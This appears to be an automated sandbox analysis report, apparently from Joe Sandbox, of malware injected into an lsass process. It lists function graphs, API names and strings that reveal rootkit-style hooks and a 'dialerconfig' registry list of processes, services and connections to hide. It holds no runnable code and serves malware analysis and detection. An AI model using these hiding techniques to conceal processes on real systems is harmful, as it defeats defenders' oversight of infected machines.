                                                    control_flow_graph 413 213bdce2b2c-213bdce2ba5 call 213bdd02ce0 416 213bdce2ee0-213bdce2f03 413->416 417 213bdce2bab-213bdce2bb1 413->417 417->416 418 213bdce2bb7-213bdce2bba 417->418 418->416 419 213bdce2bc0-213bdce2bc3 418->419 419->416 420 213bdce2bc9-213bdce2bd9 GetModuleHandleA 419->420 421 213bdce2bed 420->421 422 213bdce2bdb-213bdce2beb GetProcAddress 420->422 423 213bdce2bf0-213bdce2c0e 421->423 422->423 423->416 425 213bdce2c14-213bdce2c33 StrCmpNIW 423->425 425->416 426 213bdce2c39-213bdce2c3d 425->426 426->416 427 213bdce2c43-213bdce2c4d 426->427 427->416 428 213bdce2c53-213bdce2c5a 427->428 428->416 429 213bdce2c60-213bdce2c73 428->429 430 213bdce2c75-213bdce2c81 429->430 431 213bdce2c83 429->431 432 213bdce2c86-213bdce2c8a 430->432 431->432 433 213bdce2c8c-213bdce2c98 432->433 434 213bdce2c9a 432->434 435 213bdce2c9d-213bdce2ca7 433->435 434->435 436 213bdce2d9d-213bdce2da1 435->436 437 213bdce2cad-213bdce2cb0 435->437 438 213bdce2ed2-213bdce2eda 436->438 439 213bdce2da7-213bdce2daa 436->439 440 213bdce2cc2-213bdce2ccc 437->440 441 213bdce2cb2-213bdce2cbf call 213bdce199c 437->441 438->416 438->429 444 213bdce2dbb-213bdce2dc5 439->444 445 213bdce2dac-213bdce2db8 call 213bdce199c 439->445 442 213bdce2d00-213bdce2d0a 440->442 443 213bdce2cce-213bdce2cdb 440->443 441->440 448 213bdce2d0c-213bdce2d19 442->448 449 213bdce2d3a-213bdce2d3d 442->449 443->442 447 213bdce2cdd-213bdce2cea 443->447 451 213bdce2dc7-213bdce2dd4 444->451 452 213bdce2df5-213bdce2df8 444->452 445->444 456 213bdce2ced-213bdce2cf3 447->456 448->449 457 213bdce2d1b-213bdce2d28 448->457 458 213bdce2d3f-213bdce2d49 call 213bdce1bbc 449->458 459 213bdce2d4b-213bdce2d58 lstrlenW 449->459 451->452 461 213bdce2dd6-213bdce2de3 451->461 454 213bdce2dfa-213bdce2e03 call 213bdce1bbc 452->454 455 213bdce2e05-213bdce2e12 lstrlenW 452->455 454->455 474 213bdce2e4a-213bdce2e55 454->474 465 213bdce2e35-213bdce2e3f call 213bdce3844 455->465 466 213bdce2e14-213bdce2e1e 455->466 463 213bdce2cf9-213bdce2cfe 456->463 464 213bdce2d93-213bdce2d98 456->464 467 213bdce2d2b-213bdce2d31 457->467 458->459 458->464 469 213bdce2d7b-213bdce2d8d call 213bdce3844 459->469 470 213bdce2d5a-213bdce2d64 459->470 471 213bdce2de6-213bdce2dec 461->471 463->442 463->456 477 213bdce2e42-213bdce2e44 464->477 465->477 466->465 478 213bdce2e20-213bdce2e33 call 213bdce152c 466->478 467->464 479 213bdce2d33-213bdce2d38 467->479 469->464 469->477 470->469 472 213bdce2d66-213bdce2d79 call 213bdce152c 470->472 473 213bdce2dee-213bdce2df3 471->473 471->474 472->464 472->469 473->452 473->471 486 213bdce2ecc-213bdce2ed0 474->486 487 213bdce2e57-213bdce2e5b 474->487 477->438 477->474 478->465 478->474 479->449 479->467 486->438 488 213bdce2e5d-213bdce2e61 487->488 489 213bdce2e63-213bdce2e7d call 213bdce85c0 487->489 488->489 492 213bdce2e80-213bdce2e83 488->492 489->492 495 213bdce2e85-213bdce2ea3 call 213bdce85c0 492->495 496 213bdce2ea6-213bdce2ea9 492->496 495->496 496->486 498 213bdce2eab-213bdce2ec9 call 213bdce85c0 496->498 498->486
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                    • API String ID: 2119608203-3850299575
                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                    • Instruction ID: 5807444a8450fc688cd656404e5327faf8bf80d9ed4d8e3fcbe0e129d3a2233c
                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                    • Instruction Fuzzy Hash: 16B190B2219A9883EF65CF25D4487E9A3A6FB68B8DF445026DE0953794FB36DF40C340
                                                    Function 00000213BDCE7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                    • Instruction ID: b5ca2973510a18e9044a362400021c8bf4fd35d0e5851b09ad40746068c8bd5a
                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                    • Instruction Fuzzy Hash: E9311772209A848AEB60DF60E8847EE7366F79474CF44442ADA4E57A98EF39C748C710
                                                    Function 00000213BDCED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                    • Instruction ID: 8c31cb887ca66331edc06f01b646ec043365c389dcc0a630b6fed02098722ee4
                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                    • Instruction Fuzzy Hash: 6B319E76218B8086EB60CF25E8443DE73A1F79975CF500126EA9D47B99EF39C75ACB00
                                                    Function 00000213BDCE1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                    • API String ID: 106492572-2879589442
                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                    • Instruction ID: 9ce6f8576089a91c0a41a3022284374a307a37465a46bb01b2766921063186a7
                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                    • Instruction Fuzzy Hash: BE712A76318A5486EF10DF22E848AD923A6F7A4B8CF402121DE4E47B6DEF36C758C744
                                                    Function 00000213BDCE12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                    • String ID: d
                                                    • API String ID: 2005889112-2564639436
                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                    • Instruction ID: 7e46c3b6a7d5331c3c7ee4b2a60feacf72bead3f45980719ba22298b4a17c25e
                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                    • Instruction Fuzzy Hash: 42514D76208B8487EB54CF62E5483DA77A2F799F9DF448124DA4A0B758EF3DC259CB00
                                                    Function 00000213BDCE1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                    • API String ID: 4175298099-1975688563
                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                    • Instruction ID: 8f728ad5951c134e967336f2fc31f6c713d23b700de02865da5b7b8926e8932e
                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                    • Instruction Fuzzy Hash: D431E3B411998EA2EF01EF65EC697D4A323BB7435CF801023A44D0656AFF7A934DC391
                                                    Function 00000213BDCB6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 255 213bdcb6910-213bdcb6916 256 213bdcb6951-213bdcb695b 255->256 257 213bdcb6918-213bdcb691b 255->257 258 213bdcb6a78-213bdcb6a8d 256->258 259 213bdcb691d-213bdcb6920 257->259 260 213bdcb6945-213bdcb6984 call 213bdcb6fc0 257->260 264 213bdcb6a9c-213bdcb6ab6 call 213bdcb6e54 258->264 265 213bdcb6a8f 258->265 262 213bdcb6922-213bdcb6925 259->262 263 213bdcb6938 __scrt_dllmain_crt_thread_attach 259->263 275 213bdcb6a52 260->275 276 213bdcb698a-213bdcb699f call 213bdcb6e54 260->276 267 213bdcb6931-213bdcb6936 call 213bdcb6f04 262->267 268 213bdcb6927-213bdcb6930 262->268 271 213bdcb693d-213bdcb6944 263->271 278 213bdcb6aef-213bdcb6b20 call 213bdcb7190 264->278 279 213bdcb6ab8-213bdcb6aed call 213bdcb6f7c call 213bdcb6e1c call 213bdcb7318 call 213bdcb7130 call 213bdcb7154 call 213bdcb6fac 264->279 269 213bdcb6a91-213bdcb6a9b 265->269 267->271 281 213bdcb6a54-213bdcb6a69 275->281 288 213bdcb69a5-213bdcb69b6 call 213bdcb6ec4 276->288 289 213bdcb6a6a-213bdcb6a77 call 213bdcb7190 276->289 290 213bdcb6b22-213bdcb6b28 278->290 291 213bdcb6b31-213bdcb6b37 278->291 279->269 308 213bdcb69b8-213bdcb69dc call 213bdcb72dc call 213bdcb6e0c call 213bdcb6e38 call 213bdcbac0c 288->308 309 213bdcb6a07-213bdcb6a11 call 213bdcb7130 288->309 289->258 290->291 292 213bdcb6b2a-213bdcb6b2c 290->292 293 213bdcb6b7e-213bdcb6b94 call 213bdcb268c 291->293 294 213bdcb6b39-213bdcb6b43 291->294 298 213bdcb6c1f-213bdcb6c2c 292->298 316 213bdcb6bcc-213bdcb6bce 293->316 317 213bdcb6b96-213bdcb6b98 293->317 299 213bdcb6b4f-213bdcb6b5d call 213bdcc5780 294->299 300 213bdcb6b45-213bdcb6b4d 294->300 305 213bdcb6b63-213bdcb6b78 call 213bdcb6910 299->305 320 213bdcb6c15-213bdcb6c1d 299->320 300->305 305->293 305->320 308->309 358 213bdcb69de-213bdcb69e5 __scrt_dllmain_after_initialize_c 308->358 309->275 329 213bdcb6a13-213bdcb6a1f call 213bdcb7180 309->329 318 213bdcb6bd0-213bdcb6bd3 316->318 319 213bdcb6bd5-213bdcb6bea call 213bdcb6910 316->319 317->316 325 213bdcb6b9a-213bdcb6bbc call 213bdcb268c call 213bdcb6a78 317->325 318->319 318->320 319->320 339 213bdcb6bec-213bdcb6bf6 319->339 320->298 325->316 350 213bdcb6bbe-213bdcb6bc6 call 213bdcc5780 325->350 347 213bdcb6a21-213bdcb6a2b call 213bdcb7098 329->347 348 213bdcb6a45-213bdcb6a50 329->348 344 213bdcb6c01-213bdcb6c11 call 213bdcc5780 339->344 345 213bdcb6bf8-213bdcb6bff 339->345 344->320 345->320 347->348 357 213bdcb6a2d-213bdcb6a3b 347->357 348->281 350->316 357->348 358->309 359 213bdcb69e7-213bdcb6a04 call 213bdcbabc8 358->359 359->309
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                    • API String ID: 190073905-1786718095
                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction ID: f8cd9e1dbe3062c5f4ba020bde542ea39c0e4a61bba442b43b9d51f3a524e4ca
                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction Fuzzy Hash: 0781F4317DC24986FE50EB25D4493D966A3E7B4B8CF284025DA494B7D6FB3BCB468700
                                                    Function 00000213BDCECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 00000213BDCECE37
                                                    • FlsGetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECE4C
                                                    • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECE6D
                                                    • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECE9A
                                                    • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECEAB
                                                    • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECEBC
                                                    • SetLastError.KERNEL32 ref: 00000213BDCECED7
                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF0D
                                                    • FlsSetValue.KERNEL32(?,?,00000001,00000213BDCEECCC,?,?,?,?,00000213BDCEBF9F,?,?,?,?,?,00000213BDCE7AB0), ref: 00000213BDCECF2C
                                                      • Part of subcall function 00000213BDCED6CC: HeapAlloc.KERNEL32 ref: 00000213BDCED721
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF54
                                                      • Part of subcall function 00000213BDCED744: HeapFree.KERNEL32 ref: 00000213BDCED75A
                                                      • Part of subcall function 00000213BDCED744: GetLastError.KERNEL32 ref: 00000213BDCED764
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF65
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF76
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                    • String ID:
                                                    • API String ID: 570795689-0
                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                    • Instruction ID: 9cfdffa4e4f0b56bcb752030e4244594aa8fca63efa0d4e671618fb2b64398c0
                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                    • Instruction Fuzzy Hash: 85418DB424928C43FE68E371565E3F962435BB47BCF144738A83A476D7FE3AAB414600
                                                    Function 00000213BDCE2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                    • API String ID: 2171963597-1373409510
                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                    • Instruction ID: 6b7d2558ae4a3ac574cfc8a772d118d668cf07695c60263a9c00d2c5ba11f754
                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                    • Instruction Fuzzy Hash: 2E213D7261864483EF10CB25F44879967A2F799BACF504215EA5906BA8EF3DC349CB04
                                                    Function 00000213BDCB9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 511 213bdcb9944-213bdcb99ac call 213bdcba814 514 213bdcb99b2-213bdcb99b5 511->514 515 213bdcb9e13-213bdcb9e1b call 213bdcbbb48 511->515 514->515 516 213bdcb99bb-213bdcb99c1 514->516 518 213bdcb9a90-213bdcb9aa2 516->518 519 213bdcb99c7-213bdcb99cb 516->519 521 213bdcb9d63-213bdcb9d67 518->521 522 213bdcb9aa8-213bdcb9aac 518->522 519->518 523 213bdcb99d1-213bdcb99dc 519->523 526 213bdcb9da0-213bdcb9daa call 213bdcb8a34 521->526 527 213bdcb9d69-213bdcb9d70 521->527 522->521 524 213bdcb9ab2-213bdcb9abd 522->524 523->518 525 213bdcb99e2-213bdcb99e7 523->525 524->521 529 213bdcb9ac3-213bdcb9aca 524->529 525->518 530 213bdcb99ed-213bdcb99f7 call 213bdcb8a34 525->530 526->515 537 213bdcb9dac-213bdcb9dcb call 213bdcb6d40 526->537 527->515 531 213bdcb9d76-213bdcb9d9b call 213bdcb9e1c 527->531 534 213bdcb9ad0-213bdcb9b07 call 213bdcb8e10 529->534 535 213bdcb9c94-213bdcb9ca0 529->535 530->537 545 213bdcb99fd-213bdcb9a28 call 213bdcb8a34 * 2 call 213bdcb9124 530->545 531->526 534->535 549 213bdcb9b0d-213bdcb9b15 534->549 535->526 538 213bdcb9ca6-213bdcb9caa 535->538 542 213bdcb9cac-213bdcb9cb8 call 213bdcb90e4 538->542 543 213bdcb9cba-213bdcb9cc2 538->543 542->543 556 213bdcb9cdb-213bdcb9ce3 542->556 543->526 548 213bdcb9cc8-213bdcb9cd5 call 213bdcb8cb4 543->548 579 213bdcb9a2a-213bdcb9a2e 545->579 580 213bdcb9a48-213bdcb9a52 call 213bdcb8a34 545->580 548->526 548->556 553 213bdcb9b19-213bdcb9b4b 549->553 558 213bdcb9b51-213bdcb9b5c 553->558 559 213bdcb9c87-213bdcb9c8e 553->559 560 213bdcb9df6-213bdcb9e12 call 213bdcb8a34 * 2 call 213bdcbbaa8 556->560 561 213bdcb9ce9-213bdcb9ced 556->561 558->559 562 213bdcb9b62-213bdcb9b7b 558->562 559->535 559->553 560->515 564 213bdcb9d00 561->564 565 213bdcb9cef-213bdcb9cfe call 213bdcb90e4 561->565 566 213bdcb9b81-213bdcb9bc6 call 213bdcb90f8 * 2 562->566 567 213bdcb9c74-213bdcb9c79 562->567 575 213bdcb9d03-213bdcb9d0d call 213bdcba8ac 564->575 565->575 592 213bdcb9c04-213bdcb9c0a 566->592 593 213bdcb9bc8-213bdcb9bee call 213bdcb90f8 call 213bdcba038 566->593 572 213bdcb9c84 567->572 572->559 575->526 590 213bdcb9d13-213bdcb9d61 call 213bdcb8d44 call 213bdcb8f50 575->590 579->580 584 213bdcb9a30-213bdcb9a3b 579->584 580->518 596 213bdcb9a54-213bdcb9a74 call 213bdcb8a34 * 2 call 213bdcba8ac 580->596 584->580 589 213bdcb9a3d-213bdcb9a42 584->589 589->515 589->580 590->526 600 213bdcb9c0c-213bdcb9c10 592->600 601 213bdcb9c7b 592->601 611 213bdcb9bf0-213bdcb9c02 593->611 612 213bdcb9c15-213bdcb9c72 call 213bdcb9870 593->612 617 213bdcb9a8b 596->617 618 213bdcb9a76-213bdcb9a80 call 213bdcba99c 596->618 600->566 602 213bdcb9c80 601->602 602->572 611->592 611->593 612->602 617->518 621 213bdcb9df0-213bdcb9df5 call 213bdcbbaa8 618->621 622 213bdcb9a86-213bdcb9def call 213bdcb86ac call 213bdcba3f4 call 213bdcb88a0 618->622 621->560 622->621
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                    • Instruction ID: f386ab9bdd8cc4c87b67ff9b5e600b282352f279eca3ceb4b3cc66de4f1deea9
                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                    • Instruction Fuzzy Hash: 87E1AD32648B888AEF60DB65D4883DD77A2F769B8CF100115EE8957B99EF36C391C700
                                                    Function 00000213BDCEA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 632 213bdcea544-213bdcea5ac call 213bdceb414 635 213bdcea5b2-213bdcea5b5 632->635 636 213bdceaa13-213bdceaa1b call 213bdcec748 632->636 635->636 638 213bdcea5bb-213bdcea5c1 635->638 640 213bdcea690-213bdcea6a2 638->640 641 213bdcea5c7-213bdcea5cb 638->641 643 213bdcea6a8-213bdcea6ac 640->643 644 213bdcea963-213bdcea967 640->644 641->640 642 213bdcea5d1-213bdcea5dc 641->642 642->640 646 213bdcea5e2-213bdcea5e7 642->646 643->644 645 213bdcea6b2-213bdcea6bd 643->645 647 213bdcea9a0-213bdcea9aa call 213bdce9634 644->647 648 213bdcea969-213bdcea970 644->648 645->644 649 213bdcea6c3-213bdcea6ca 645->649 646->640 650 213bdcea5ed-213bdcea5f7 call 213bdce9634 646->650 647->636 660 213bdcea9ac-213bdcea9cb call 213bdce7940 647->660 648->636 651 213bdcea976-213bdcea99b call 213bdceaa1c 648->651 653 213bdcea6d0-213bdcea707 call 213bdce9a10 649->653 654 213bdcea894-213bdcea8a0 649->654 650->660 665 213bdcea5fd-213bdcea628 call 213bdce9634 * 2 call 213bdce9d24 650->665 651->647 653->654 669 213bdcea70d-213bdcea715 653->669 654->647 661 213bdcea8a6-213bdcea8aa 654->661 662 213bdcea8ac-213bdcea8b8 call 213bdce9ce4 661->662 663 213bdcea8ba-213bdcea8c2 661->663 662->663 676 213bdcea8db-213bdcea8e3 662->676 663->647 668 213bdcea8c8-213bdcea8d5 call 213bdce98b4 663->668 700 213bdcea62a-213bdcea62e 665->700 701 213bdcea648-213bdcea652 call 213bdce9634 665->701 668->647 668->676 674 213bdcea719-213bdcea74b 669->674 678 213bdcea751-213bdcea75c 674->678 679 213bdcea887-213bdcea88e 674->679 681 213bdcea8e9-213bdcea8ed 676->681 682 213bdcea9f6-213bdceaa12 call 213bdce9634 * 2 call 213bdcec6a8 676->682 678->679 683 213bdcea762-213bdcea77b 678->683 679->654 679->674 685 213bdcea8ef-213bdcea8fe call 213bdce9ce4 681->685 686 213bdcea900 681->686 682->636 687 213bdcea781-213bdcea7c6 call 213bdce9cf8 * 2 683->687 688 213bdcea874-213bdcea879 683->688 696 213bdcea903-213bdcea90d call 213bdceb4ac 685->696 686->696 715 213bdcea7c8-213bdcea7ee call 213bdce9cf8 call 213bdceac38 687->715 716 213bdcea804-213bdcea80a 687->716 693 213bdcea884 688->693 693->679 696->647 708 213bdcea913-213bdcea961 call 213bdce9944 call 213bdce9b50 696->708 700->701 706 213bdcea630-213bdcea63b 700->706 701->640 714 213bdcea654-213bdcea674 call 213bdce9634 * 2 call 213bdceb4ac 701->714 706->701 712 213bdcea63d-213bdcea642 706->712 708->647 712->636 712->701 738 213bdcea68b 714->738 739 213bdcea676-213bdcea680 call 213bdceb59c 714->739 732 213bdcea7f0-213bdcea802 715->732 733 213bdcea815-213bdcea872 call 213bdcea470 715->733 720 213bdcea87b 716->720 721 213bdcea80c-213bdcea810 716->721 726 213bdcea880 720->726 721->687 726->693 732->715 732->716 733->726 738->640 742 213bdcea9f0-213bdcea9f5 call 213bdcec6a8 739->742 743 213bdcea686-213bdcea9ef call 213bdce92ac call 213bdceaff4 call 213bdce94a0 739->743 742->682 743->742
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                    • Instruction ID: a4356b529713084a557e2c4423f012a0144f846992504cd020869ae66375d7b3
                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                    • Instruction Fuzzy Hash: E0E19BB26087888BEF20DB6594883DD77A6F76578CF100126EA8D97B95EB35E381C704
                                                    Function 00000213BDCEF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                    • Instruction ID: 64b1116dec4a1fc2bb3371278ef814e94841622c5338f0fb36631d38e615d017
                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                    • Instruction Fuzzy Hash: 7941F6B231AA0442FE16CB56A8087D52393FB65BACF1442399D0D8B789FE3ED7458354
